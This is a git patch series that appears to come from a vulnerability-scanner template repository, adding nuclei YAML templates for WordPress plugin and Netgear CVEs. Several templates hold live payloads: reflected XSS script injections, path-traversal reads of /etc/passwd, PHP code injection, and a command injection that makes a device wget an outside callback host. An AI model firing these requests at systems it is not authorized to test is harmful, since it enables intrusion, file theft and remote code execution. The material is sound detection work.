Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117 tags: cve,cve2013,wordpress,xss,wp-plugin From 2dbf5488acb2568369daea45e48c0284bfe485d4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:45:24 +0000 Subject: [PATCH 0591/4083] Auto Update README [Wed Jul 14 13:45:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c7873ffac9..572ed1560d 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 410 | vulnerabilities | 227 | exposed-panels | 200 | +| cves | 410 | vulnerabilities | 228 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1524 files**. +**127 directories, 1525 files**. From bad21d54b452e24c5444d965762da5e8f473f893 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:46:13 +0000 Subject: [PATCH 0592/4083] Auto Update README [Wed Jul 14 13:46:13 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 572ed1560d..09907c6621 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 410 | vulnerabilities | 228 | exposed-panels | 200 | +| cves | 411 | vulnerabilities | 228 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1525 files**. +**127 directories, 1526 files**. From 336ea2618171b98c99ba2fc923147310302f784f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 19:22:11 +0530 Subject: [PATCH 0593/4083] Update CVE-2013-4625.yaml --- cves/2013/CVE-2013-4625.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2013/CVE-2013-4625.yaml b/cves/2013/CVE-2013-4625.yaml index e4336bb47d..4b9f9136b6 100644 --- a/cves/2013/CVE-2013-4625.yaml +++ b/cves/2013/CVE-2013-4625.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 tags: cve,cve2013,wordpress,xss,wp-plugin From 61cc2d3d40b76d25d83babae96d927119819dc34 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:52:59 +0000 Subject: [PATCH 0594/4083] Auto Update README [Wed Jul 14 13:52:59 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 09907c6621..7878ab7bcf 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 411 | vulnerabilities | 228 | exposed-panels | 200 | +| cves | 412 | vulnerabilities | 228 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1526 files**. +**127 directories, 1527 files**. From 930abafc4da760d8040c705368fcf927cdd969bd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:54:23 +0000 Subject: [PATCH 0595/4083] Auto Update README [Wed Jul 14 13:54:23 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7878ab7bcf..2e7d261c04 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 412 | vulnerabilities | 228 | exposed-panels | 200 | +| cves | 414 | vulnerabilities | 228 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1527 files**. +**127 directories, 1529 files**. From e904f97937fd97f917fcd29e80ce6cafdb8780d0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 19:26:20 +0530 Subject: [PATCH 0596/4083] Update CVE-2015-1000012.yaml --- cves/2015/CVE-2015-1000012.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index 0161acc83b..eb9030aeb7 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -4,7 +4,9 @@ info: name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) author: daffainfo severity: high - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + reference: | + - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 tags: cve,cve2015,wordpress,wp-plugin,lfi requests: From 508a1047285eae402cd40f10fd5b755ac2f09486 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:58:04 +0000 Subject: [PATCH 0597/4083] Auto Update README [Wed Jul 14 13:58:04 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2e7d261c04..a2a5e2ef24 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 414 | vulnerabilities | 228 | exposed-panels | 200 | +| cves | 415 | vulnerabilities | 229 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1529 files**. +**127 directories, 1531 files**. From f218ea12ee656533b0c7ee4aa58f484d374bf9be Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 19:28:30 +0530 Subject: [PATCH 0598/4083] Update CVE-2012-4768.yaml --- cves/2012/CVE-2012-4768.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-4768.yaml b/cves/2012/CVE-2012-4768.yaml index 2ebc5c7372..e89963b08e 100644 --- a/cves/2012/CVE-2012-4768.yaml +++ b/cves/2012/CVE-2012-4768.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 tags: cve,cve2012,wordpress,xss,wp-plugin From e43c3befdfb94df6ed4b04149f01334059678b51 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 21:13:26 +0700 Subject: [PATCH 0599/4083] Create CVE-2015-9480.yaml --- cves/2015/CVE-2015-9480.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2015/CVE-2015-9480.yaml diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml new file mode 100644 index 0000000000..4508aab2d3 --- /dev/null +++ b/cves/2015/CVE-2015-9480.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-9480 + +info: + name: WordPress Plugin RobotCPA 5 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 + - https://www.exploit-db.com/exploits/37252 + tags: cve,cve2015,wordpress,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 From afe9dc69bf517f67f72ce6b7688fc2bfa6680c8c Mon Sep 17 00:00:00 2001 From: Pham Sy Minh <59408894+shelld3v@users.noreply.github.com> Date: Wed, 14 Jul 2021 21:54:46 +0700 Subject: [PATCH 0600/4083] File name correction --- ...e-server-detect.yaml => microsoft-exchange-server-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{microsoft-echange-server-detect.yaml => microsoft-exchange-server-detect.yaml} (100%) diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-exchange-server-detect.yaml similarity index 100% rename from technologies/microsoft-echange-server-detect.yaml rename to technologies/microsoft-exchange-server-detect.yaml From 117b0558a92640a57a1c5f533e678059331669d7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 14 Jul 2021 20:55:05 +0530 Subject: [PATCH 0601/4083] Update sassy-social-share.yaml --- vulnerabilities/wordpress/sassy-social-share.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/sassy-social-share.yaml b/vulnerabilities/wordpress/sassy-social-share.yaml index 18de717ad7..e9acae08cf 100644 --- a/vulnerabilities/wordpress/sassy-social-share.yaml +++ b/vulnerabilities/wordpress/sassy-social-share.yaml @@ -15,7 +15,9 @@ requests: matchers: - type: word words: - - '{"facebook":1,"facebook_urls":[{"":""}],"status":1,"message":' + - '[{"":""}]' + - 'facebook' + - 'twitter' part: body condition: and From 65166046e7b543d26cafc8931ca1c63f36ce2477 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 06:17:43 +0700 Subject: [PATCH 0602/4083] Create CVE-2011-5106.yaml --- cves/2011/CVE-2011-5106.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2011/CVE-2011-5106.yaml diff --git a/cves/2011/CVE-2011-5106.yaml b/cves/2011/CVE-2011-5106.yaml new file mode 100644 index 0000000000..d1855beed3 --- /dev/null +++ b/cves/2011/CVE-2011-5106.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5106 + +info: + name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From b3766162cc0e17343bc48d1a542167e93a8000d8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 06:19:57 +0700 Subject: [PATCH 0603/4083] Create CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2012/CVE-2012-1835.yaml diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml new file mode 100644 index 0000000000..284837442b --- /dev/null +++ b/cves/2012/CVE-2012-1835.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-1835 + +info: + name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From ad3f81bc951805b70a3c647ed27cb00761363a13 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 06:21:50 +0700 Subject: [PATCH 0604/4083] Create wp-custom-tables-xss.yaml --- .../wordpress/wp-custom-tables-xss.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-custom-tables-xss.yaml diff --git a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml new file mode 100644 index 0000000000..625826efba --- /dev/null +++ b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -0,0 +1,29 @@ +id: wp-custom-tables-xss + +info: + name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54326/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From ad69ef25cbe90b66c9a6890194a4ebe7770e8470 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 06:51:46 +0700 Subject: [PATCH 0605/4083] Create CVE-2012-4273.yaml --- cves/2012/CVE-2012-4273.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2012/CVE-2012-4273.yaml diff --git a/cves/2012/CVE-2012-4273.yaml b/cves/2012/CVE-2012-4273.yaml new file mode 100644 index 0000000000..f0e1758ce3 --- /dev/null +++ b/cves/2012/CVE-2012-4273.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-4273 + +info: + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6a0d2d2b90772be83fa788894e7cc0c7b6e7c283 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 06:54:35 +0700 Subject: [PATCH 0606/4083] Create CVE-2021-24389.yaml --- cves/2021/CVE-2021-24389.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2021/CVE-2021-24389.yaml diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml new file mode 100644 index 0000000000..eb76e1a472 --- /dev/null +++ b/cves/2021/CVE-2021-24389.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-24389 + +info: + name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 1dedb2aee544e4d82ad369ac0f69dfa3f9f96871 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 06:59:13 +0700 Subject: [PATCH 0607/4083] Create CVE-2014-4513.yaml --- cves/2014/CVE-2014-4513.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2014/CVE-2014-4513.yaml diff --git a/cves/2014/CVE-2014-4513.yaml b/cves/2014/CVE-2014-4513.yaml new file mode 100644 index 0000000000..ffde70494d --- /dev/null +++ b/cves/2014/CVE-2014-4513.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-4513 + +info: + name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513 + tags: cve,cve2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e34ec6c05cce7329b8bf42c7590932680f90ba9f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 07:06:50 +0700 Subject: [PATCH 0608/4083] Create CVE-2021-24335.yaml --- cves/2021/CVE-2021-24335.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2021/CVE-2021-24335.yaml diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml new file mode 100644 index 0000000000..ee84edbae4 --- /dev/null +++ b/cves/2021/CVE-2021-24335.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-24335 + +info: + name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 67ae44be04b4af872489bc9ee6602e7726a3186b Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 10:54:56 +0900 Subject: [PATCH 0609/4083] Create CVE-2020-26919.yaml it was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-26919.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2020/CVE-2020-26919.yaml diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml new file mode 100644 index 0000000000..fffb1e22e4 --- /dev/null +++ b/cves/2020/CVE-2020-26919.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-26919 + +info: + name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. + reference: | + - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,netgear,rce + +requests: + - raw: + - | + POST /login.htm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd= + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 1af27d9260266eb7e5f27382a832ede96cbae7ef Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 09:41:14 +0700 Subject: [PATCH 0610/4083] Create CVE-2016-10960.yaml --- CVE-2016-10960.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 CVE-2016-10960.yaml diff --git a/CVE-2016-10960.yaml b/CVE-2016-10960.yaml new file mode 100644 index 0000000000..3110e9b2eb --- /dev/null +++ b/CVE-2016-10960.yaml @@ -0,0 +1,25 @@ +id: CVE-2016-10960 + +info: + name: wSecure Lite < 2.4 - Remote Code Execution (RCE) + author: daffainfo + severity: critical + description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + tags: cve,cve2016,wordpress,wp-plugin,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" + body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="' + + matchers-condition: and + matchers: + - type: word + words: + - "Hello, world." + condition: and + - type: status + status: + - 200 From 3fa2bf156ac6718066b74d2a7eb15d9b2932101a Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 09:48:59 +0700 Subject: [PATCH 0611/4083] Create CVE-2019-9618.yaml --- cves/2019/CVE-2019-9618.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2019/CVE-2019-9618.yaml diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml new file mode 100644 index 0000000000..de167e65af --- /dev/null +++ b/cves/2019/CVE-2019-9618.yaml @@ -0,0 +1,26 @@ +id: CVE-2019-9618 + +info: + name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI) + author: daffainfo + severity: high + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 + - https://seclists.org/fulldisclosure/2019/Mar/26 + tags: cve,cve2019,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 3c2a1cd727ad8b5c0f2ea0f1d7083a2df07547a4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 10:01:50 +0700 Subject: [PATCH 0612/4083] Create CVE-2011-1669.yaml --- cves/2011/CVE-2011-1669.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2011/CVE-2011-1669.yaml diff --git a/cves/2011/CVE-2011-1669.yaml b/cves/2011/CVE-2011-1669.yaml new file mode 100644 index 0000000000..a004a892bc --- /dev/null +++ b/cves/2011/CVE-2011-1669.yaml @@ -0,0 +1,26 @@ +id: CVE-2011-1669 + +info: + name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) + author: daffainfo + severity: high + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 + - https://www.exploit-db.com/exploits/17119 + tags: cve,cve2011,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 0d24b0c6714a43d50417c4158b4104fadbdfa195 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 14 Jul 2021 22:24:13 -0500 Subject: [PATCH 0613/4083] Update selea-ip-camera.yaml --- iot/selea-ip-camera.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/iot/selea-ip-camera.yaml b/iot/selea-ip-camera.yaml index 9825d7a8b5..c311717257 100644 --- a/iot/selea-ip-camera.yaml +++ b/iot/selea-ip-camera.yaml @@ -2,9 +2,10 @@ id: selea-ip-camera info: name: Detect Selea Targa IP OCR-ANPR Camera author: geeknik - description: Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php + description: Various version of the Selea Targa IP OCR-ANPR Camera are vulnerable to an Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure flaw + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php severity: info - tags: iot + tags: iot,selea,targa requests: - method: GET @@ -17,6 +18,9 @@ requests: part: header words: - "SeleaCPSHttpServer" + - "selea_httpd" + - "HttpServer/0.1" + condition: or - type: word part: body words: From ca75afe52cff61438f23323e74d78bbf51eed12a Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 10:38:35 +0700 Subject: [PATCH 0614/4083] Create CVE-2021-24320.yaml --- cves/2021/CVE-2021-24320.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2021/CVE-2021-24320.yaml diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml new file mode 100644 index 0000000000..20d6a12131 --- /dev/null +++ b/cves/2021/CVE-2021-24320.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-24320 + +info: + name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 031cd244804e517651f12b54c0980e6f09f26e77 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 10:52:21 +0700 Subject: [PATCH 0615/4083] Create CVE-2021-24298.yaml --- cves/2021/CVE-2021-24298.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2021/CVE-2021-24298.yaml diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml new file mode 100644 index 0000000000..11327ee276 --- /dev/null +++ b/cves/2021/CVE-2021-24298.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-24298 + +info: + name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298 + tags: cve,cve2021,wordpress,xss,wp-plugin + 